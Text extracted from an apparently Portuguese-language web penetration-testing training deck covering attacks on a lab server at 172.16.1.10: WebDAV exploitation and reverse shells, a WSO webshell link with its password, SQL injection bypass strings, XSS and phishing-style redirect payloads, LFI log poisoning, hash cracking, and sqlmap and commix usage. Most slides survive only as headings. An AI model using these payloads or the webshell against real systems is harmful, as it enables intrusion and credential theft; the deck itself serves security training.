Pentest Web - Blackbox
Pentest Web - Blackbox
Pentest Web - Blackbox
25/05/2021 1 /42
https://raw.githubusercontent.com/carlosalbertotuma/DCPT-Pentesting/main/Sw1tchbl4d3.sh
25/05/2021 2 /42
Fases do Pentester
25/05/2021 3 /42
Enumeração de Serviços
25/05/2021 4 /42
Enumeração Arquivos/Pastas – Servidor Web
200 - OK
401 - Não autorizado
https://www.hostinger.com.br/tutoriais/o-que-e-http-error-e-principais-codigos-http
25/05/2021 5 /42
Clonando Web Site
wget -m http://172.16.1.10/turismo/
25/05/2021 6 /42
Análise de Vulnerabilidade – Método HTTP
25/05/2021 7 /42
Exploração de vulnerabilidade – WebDav - RCE
cadaver http://172.16.1.10/webdav/
25/05/2021 8 /42
Exploração de vulnerabilidade – WebDav – RCE – Reverse Shell
25/05/2021 9 /42
Exploração de vulnerabilidade – WebDav – RCE – Reverse Shell
25/05/2021 10 /42
Exploração de vulnerabilidade – WebDav – upload de arquivos
25/05/2021 11 /42
Exploração de vulnerabilidade – WebDav – WebShell Gráfica – Reverse Shell
ghost287
https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php
25/05/2021 12 /42
Análise de Vulnerabilidades
Vetores de Ataque
Campos de Buscas
Campos de Login / Autenticação
Campos de Registro / Cadastro
Redirecionamentos
Parâmetros GET e POST
Download
Upload
Posts
25/05/2021 13 /42
Análise de Vulnerabilidades / Exploração - Bypass Authentication: SQL Injection
https://github.com/v0re/dirb/tree/master/wordlists
rockyou.txt ‘ or 2=2#
https://github.com/1N3/IntruderPayloads
teste’ or id=1#
25/05/2021 14 /42
Análise de Vulnerabilidades / Exploração - Full Path Discovery - Paramentro
25/05/2021 15 /42
Análise de Vulnerabilidades / Exploração - Path Traversal
25/05/2021 16 /42
Brute Force Hash Linux
john hashlinux.txt--wordlist=rockyou.txt
john hashlinux.txt --show
25/05/2021 17 /42
Análise de Vulnerabilidades / Exploração - Bypass Authentication: Metodo HTTP
administrador:michael
25/05/2021 18 /42
HTML Injection – XSS Cross Site Scripting – Refletido - Self-XSS
<h1>teste</h1>
<form>LOGIN:<input type=”text”></form>
<a href=”http://clone/”><h1>50%Desconto</h1></a>
<script>alert(document.cookie)</script>
<script>document.location=”clone”</script>
http://172.16.1.10/turismo/procurar.php/”><scrip>alert(“teste”)</script>
25/05/2021 19 /42
XSS Cross Site Scripting – XSSTRIKE
25/05/2021 20 /42
Análise de Vulnerabilidade / Exploração – Full Path Discovery – Local File Inclusion
25/05/2021 21 /42
Infecção de log Apache – Local File Inclusion - Remote Code Execution
25/05/2021 22 /42
Infecção de Log SSH – Local File Inclusion - Remote Code Execution
25/05/2021 23 /42
Infecção de log SSH – Local File Inclusion - Remote Code Execution
25/05/2021 24 /42
Open Redirect - Parâmetro Codificado– Remote File Inclusion - Remote Code Execution
http://172.16.1.10/turismo/pages.php?page=bG9naW4ucGhw
http://172.16.1.10/turismo/redir.php?url=http://facebook.com/mrturismo20
25/05/2021 25 /42
Automatizando Testes SQLI – GET – POST - SQLMAP
sqlmap -u "http://172.16.1.10/turismo/agencias.php?loja=sp" --dbs
25/05/2021 26 /42
Automatizando Testes SQLI – GET - SQLMAP
c
25/05/2021 27 /42
Automatizando Testes SQLI – GET - SQLMAP
25/05/2021 28 /42
Command Injection
25/05/2021 29 /42
Command Injection
25/05/2021 30 /42
Command Injection - Commix
25/05/2021 31 /42
Command Injection – Automatizando com commix
25/05/2021 32 /42
Blind SQLi – BURP SUITE
25/05/2021 33 /42
Blind SQLi – BURP SUITE
25/05/2021 34 /42
Blind SQLi – BURP SUITE
25/05/2021 35 /42
Blind SQLi – BURP SUITE
25/05/2021 36 /42
Blind SQLi Avançado – BURP SUITE
25/05/2021 37 /42
BURP SUITE – INTRUDER – LFI - PAYLOADS
25/05/2021 38 /42
BURP SUITE – BRUTE FORCE - DECODER
25/05/2021 39 /42
BURP SUITE – BRUTE FORCE - DECODER
25/05/2021 40 /42
BURP SUITE – BRUTE FORCE - DECODER
25/05/2021 41 /42
Script Analisando - BURP SUITE
25/05/2021 42 /42